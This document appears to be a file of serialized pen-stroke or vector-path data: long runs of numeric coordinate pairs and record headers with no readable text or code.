0,0-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,2 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,4 1 0,27 11 0,-1-2 0,128 20 0,-118-7 0,-32-20 0,32 19 0,33 18 0,-1 13 0,-59-48 0,-1 0 0,1-2 0,0 1 0,22 3 0,1 0 0,-37-8 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,1 2 0,-2-3 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,1 1 0,4 1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,6 5 0,30 22 0,-24-21 0,55 34 0,-61-38 0,12 10 0,10 5 0,-23-15 0,-5-1 0,-1-3 0,1-1 0,-1 1 0,1 0 0,0-1 0,0 0 0,-1 0 0,1 0 0,8 1 0,-1-2 0,0 0 0,-1 1 0,1 3 0,0-3 0,0-1 0,6-3-30,-21-2-73,-19-4-389,22 9 320,-47-15-6217,-1-1-5900,19 14 3460,17-3 4670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4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34 544,'0'0'2612,"-11"-7"1301,12-1 2037,-2-7-1026,1 15-4892,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1-1 0,0 1-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 0-1,0 0 1,-2 2 1928,1 5-12,1-6-1875,0 0-1,0-1 0,-1 1 0,1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 0,0-1 1,1 1-1,-1-1 0,1 1 1,-1 0-1,0-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,-1-1-1,1 0 0,1 1 0,15 23 23,-9-12-50,55 38 643,-46-38-628,-14-11-55,-1 0 0,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,-1 0-1,3 4 1,-1-2-22,1 0 1,-1-1-1,0 0 0,1 1 0,0-1 1,-1-1-1,6 4 0,21 19-69,-25-20 68,2 4 61,1-1 0,0 0 0,0 0 0,0-1 0,13 8 0,-19-14-42,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,0-1 0,0 1 0,0 0-1,-1 0 1,1 0 0,0 0-1,-1 0 1,1 1 0,0 2-1,11 7 17,-13-12-18,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,0-1 0,2 11-13,-48 25 23,2-9-4,14-9 10,11-4 51,-223 162 2548,196-142-2089,-19 12 226,-10-2-45,47-28-364,25-13-301,-1-1-1,1 1 0,-1-1 1,1 1-1,-1-1 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-7 0 1,8-1-29,-21-25-5785,11-10-6558,11 11 3339,0 17 4653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0 188 680,'0'0'2503,"2"-18"1800,70-67 873,-50 62-2480,-1 2-909,-20 20-1757,0-1 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0-1,-1 0 1,1 1 0,1-1 0,1 0-1,39-11-129,-16 9 119,-24 2-8,1 1-1,0-1 1,-1 1 0,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1-1 0,-1 1 0,1 0 0,4 1 0,8 5 51,-14-6-58,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,3 3 0,-2-1-4,0-1 1,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,-1 0-1,0 0 1,0 0 0,-2 5 0,-8 54 56,-14 29-21,20-76-37,-1-1 1,0 1 0,0-1 0,-2-1 0,1 1-1,-2-1 1,0 0 0,-18 19 0,-48 53 78,53-62-51,19-20-14,0 1 1,0 0 0,-1-1 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0-1-1,0 0 1,0 0 0,-8 3 0,12-5 2,-1 0 0,0 0 0,0 0 1,0 1-1,1-1 0,-1 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 1,1 0-1,-1 0 0,0-1 0,0 1 1,1 0-1,-1-1 0,-1 0 0,-11-3 140,12 4-154,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 0,0 1 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0-1 1,-1 1-1,1 0 0,0-1 0,0 1 1,-1-1-1,1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 1,7-24 14,-4 14-2,-2 9-13,-1-1 0,1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1-1,3-2 1,22-22 8,-25 23-10,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,4 1 0,7 3 2,-12-4 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0-1 0,2 2 0,25 17 77,-24-18-76,0 0 0,-1 0 1,0 0-1,1 0 0,-1 1 1,0 0-1,0-1 0,0 1 1,4 6-1,-4-6 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1-1-1,0 1 1,0-1-1,0 0 1,0 0-1,1 0 1,-1 0-1,0-1 1,1 0-1,0 0 1,-1 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,5-1 1,-1-2-99,-6-11-8403,0 2 2227,6 5 2643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1252,'0'-14'13137,"2"10"-10652,5 4-2471,-5 0-187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1544,'0'1'115,"1"-1"1,-1 0-1,0 0 0,1 0 0,-1 0 1,1-1-1,-1 1 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1 0 1,0-1-1,1 1 0,-1 0 0,0 0 1,0-1-1,1 1 0,-1 0 0,0-1 1,0 1-1,1 0 0,-1-1 0,0 1 0,0 0 1,0-1-1,0 1 0,1-1 0,-1 1 1,0-1-1,0 1 0,0 0 0,0-1 1,0 0-26,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,1 0-1,-1-1 1,0 1-1,0 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 1,1 0-1,-1 0 1,0 0-1,1-1 1,-1 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1-1-1,0 1 0,4 0 3276,-2 1-3150,-1-1 1,1 1-1,-1-1 1,0 1-1,1 0 1,-1 0 0,0-1-1,0 1 1,0 0-1,0 0 1,1 0-1,-1 0 1,0 1-1,-1-1 1,1 0-1,0 0 1,1 2-1,8 17 698,-9-19-873,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 1 1,-1 0-1,1-1 0,-1 4 0,11 26 682,0 24 50,0-2-127,-1 1-149,-10-37-391,-1-13-94,1-1-1,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,2 4 1,-1 4-12,-2 8 14,-3-20-27,2 1-69,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1-1,-1 1 1,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1-1,1-3-1341,-2-12-7971,0 11 8303,-8-3-2302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10 186 588,'-9'-11'5874,"50"-34"-1684,-16 18-2800,-22 22-1155,0 1-1,1-1 0,0 1 1,0 0-1,0 0 0,1 1 1,8-6-1,39-41 2334,-48 48-2501,1-1-1,0 1 1,1 1 0,-1-1 0,0 1-1,0-1 1,1 2 0,-1-1 0,1 1-1,-1-1 1,0 1 0,1 1-1,-1-1 1,1 1 0,-1 0 0,0 0-1,1 1 1,8 3 0,-6-3-39,1 0-1,-1 0 1,0 1-1,-1 0 1,1 1-1,0-1 1,-1 2 0,0-1-1,0 1 1,11 10-1,-17-14 1,0 0-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 1,0 0-1,1-1 0,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 0,-1-1 1,-1 3-1,-18 29 406,-34 28 518,38-35-504,16-25-432,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,2 2 0,2 1 32,1-1 0,0 1-1,0-1 1,0 0 0,0-1-1,0 1 1,1-1 0,10 2 0,61 16 140,-70-17-218,0 0 0,-1 1-1,1 0 1,0 1 0,-1-1-1,0 1 1,0 0-1,0 1 1,6 5 0,-11-9 55,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 1,-1 1-1,-27 31 965,18-22-670,4-5-172,1 0 0,-1-1 1,0 1-1,0-2 0,-11 7 0,-18 12 325,-31 7-65,52-22-397,-1 0 0,0-1 1,0-1-1,0 0 1,-1-1-1,-23 3 0,26-9-243,12-2-2540,20-9-6661,12-7 607,-19 12 5302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1640,'12'-13'7008,"-11"12"-6816,0 1 1,-1-1-1,1 1 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-1-1 0,1 0 0,0 1 1,0-1-1,0 1 0,1 1-17,0 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 4 0,1 6-4,0 0 0,-1 0 0,-1 0 0,0 16 0,10 31 71,-11-55-230,0-2 37,1 1 0,-1-1-1,0 0 1,0 1 0,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,-3 4-1,-1-1 239,5-4-235,0-1 1,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-1 0 0,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1-1 1,-1-1 27,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-4 0,0 2-58,1 0 1,-1 0-1,1-1 1,1 1 0,-1 0-1,1-1 1,0 1 0,0 0-1,2-6 1,0 4-66,-1 0 1,1 0-1,1 1 0,-1-1 1,1 1-1,0 0 1,0 0-1,1 0 0,0 0 1,0 1-1,6-5 0,46-27-5659,-1 7-5703,-37 23 8055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119 105 72,'0'0'124,"-1"0"0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 1,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1 0 0,2 4 170,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 0,6 6 0,-4-7-223,0 0 0,0 0 0,0 0-1,0 0 1,0-1 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 0 0,8-2 0,-5 1 116,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 0 0,-1 1 0,0-2 0,6-9 0,-8 11-20,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 1,0 0-1,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-2-6 0,1 8-104,1 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 0 0,1 1-1,0 0 1,-1-1 0,0 1 0,1 0-1,-1 0 1,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,0 1 0,-5 0 0,-21 0 292,17-1-276,0 1-1,-1 0 1,1 1 0,0 0-1,-1 1 1,1 1-1,-13 4 1,10-1-72,0 1 1,1 1-1,0 1 1,-25 19-1,28-20-34,9-6-71,0-1-1,0 1 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,1 1 1,-1-1-1,1 1 1,0-1-1,0 4 0,0-3-531,0 0 0,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 0 0,0 0-1,3 4 1,6 1-2660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29 668,'-2'-11'4354,"-6"11"1791,14 11-2546,9 8-1691,-5 18-1096,-5-28-670,1 6 146,-6 117 702,0-131-979,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 1,-1 1-1,1-1 0,-1 1 0,1-1 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,1-1 0,45-27 418,-34 19-453,59-43 47,-70 51-26,8 19-9,-10-12 15,0-6 5,0 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 1 1,-1-1-1,1 0 0,-1 1 0,0-1 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 1,0 0-1,22-15 1032,-19 12-965,0 0 0,0 0 1,-1 0-1,1 0 0,-1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,2-8 0,7-48 94,-10 58-167,1 0-19,-1 1-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0 0 0,0 0 1,0 0-1,-3-4 0,4 6-80,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,1 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,-1 18-9793,1-18 9500,0 6-2855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43 320,'-17'-11'3168,"12"8"-2397,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 1 0,0 1 0,-9-1 0,-12-2 1303,24 2-1845,0 0 0,0 1-1,0-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 1 1,-4 2 0,5-2 213,2-1-434,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,10 27-11,-2-6 4,-8-18-2,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,3 3 1,-3-3 0,1-1-1,-1 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 4 1,11 23-11,-11-28 13,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 0 1,-2 3-1,-6 7 19,8-9-18,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1-1-1,-4 2 1,-17 8 16,13-12 4,-5-6-11,14 8-180,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,1 0 0,0 0-464,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,2 0 0,6 0-2421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4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44 108 1612,'3'2'488,"-1"-1"1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 0,0 0 1,4 0-1,28-10 1488,-24 5-1602,-1-1 0,0 0 0,-1-1 1,9-8-1,-7 7-78,-10 7-143,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 0,1-1 1,-1 1-1,-1-1 0,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,0 1 1,1-1-1,-1 0 0,0 0 1,0-3-1,7-3 806,-5 6-682,-11-2 4,2 3-126,0 0 1,0 0 0,0 1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 2-1,1-1 1,-1 1-1,0 0 1,0 0 0,1 1-1,-1 0 1,-6 4-1,4-2-59,1 0-1,0 0 0,0 1 1,0 0-1,0 1 1,1-1-1,0 1 0,1 1 1,-11 14-1,16-20-92,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,2 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 1,0 1-1,2 2 0,21 27 98,-12-24-302,0 0 0,1 0-1,-1-1 1,1-1-1,1 0 1,-1-1 0,1 0-1,-1-1 1,1-1 0,0 0-1,0-1 1,21-1 0,-30 0-373,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,8-3 1,14-5-6227,-15 9 3309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12 474 892,'0'0'5813,"-11"7"2077,17-9-7471,-1 0-1,1 1 1,-1-2 0,1 1-1,-1-1 1,0 0-1,0 0 1,6-5-1,62-46 550,-46 35-868,45-41-1,8-13-111,-44 42 84,-1-2 0,42-52-1,-23 24 171,-35 47 46,-17 13-213,-1 1-1,0-1 1,1 1-1,-1-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0-1-1,-1 1 1,1 0 0,-1 0-1,2-3 1,-2 4-52,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 1 1,1-1 0,-1 0-1,0 1 1,0-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-10 52 769,9-35-703,2-1 0,0 0 1,6 28-1,-4-30-77,-1 0-1,-1 0 1,0 0 0,-2 22-1,0-22-3,1-1 0,0 1 0,1-1 0,4 21 0,3 12-2,-7-36-3,1 0 1,0 0 0,0-1-1,8 21 1,-2-10 7,-8-17-12,1-1-1,0 1 1,0-1 0,0 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,0 0 0,0-1-1,0 1 1,3 3 0,-3-5-25,-2-1-29,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 1,0 1-1,0-1 0,-30-37-11978,26 26 8689,-5-1 111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 1708,'-22'-5'10155,"55"5"-6184,96 30-2971,-45-14-5704,-39-14-3234,-34 3 4954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67 1464,'-10'-12'11898,"10"14"-11686,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 0 0,-1 1 0,0-1 0,-1 1 0,1 2-146,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,2 6 0,-1 5 43,-5 45 93,2-46-165,1 0 1,0 0-1,1 0 1,1 0-1,4 25 1,6 25 493,-9-55-460,-1 0 0,0 0-1,0 0 1,-1 17 0,-4-3 75,4-23-141,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1-3-4,0 1 0,0-1 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,1 0 0,0-4 0,0-5-7,-2-8 6,1 1 1,1 0-1,1 0 1,1 0-1,1 0 1,8-28 0,-1 13 13,-10 29-14,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,-1 0 1,1-1-1,6-7 0,-8 10 0,7-8-2,0 0 0,1 0 0,0 1 0,1 0 0,-1 1 1,2 0-1,0 0 0,0 1 0,18-10 0,-6 8-5,-15 6-2,1 0 1,-1 0-1,1 1 0,0 0 1,0 1-1,0 0 0,0 1 1,15-2-1,-24 4 8,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1-1 1,1 1-1,-27 24-16,24-22 13,-17 14-16,-2-2 0,0 0-1,0-1 1,-1-1 0,-25 10 0,34-16-497,0 2-1,0 0 1,0 0-1,1 1 1,-19 17-1,29-13-3374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29 1348,'11'1'11214,"-1"42"-6624,0-14-3826,-8-26-711,0 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 5-1,3 33 230,-2-36-255,-1 1 0,0-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,0-1-1,-3 10 0,-7 25 98,0 15 324,9-34-153,2-21-280,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0-1 1,-1 2-1,-9 12 87,11-15-89,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 1,-1 0-1,1 0 0,0 0 0,0-1 0,-1 1 1,1 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 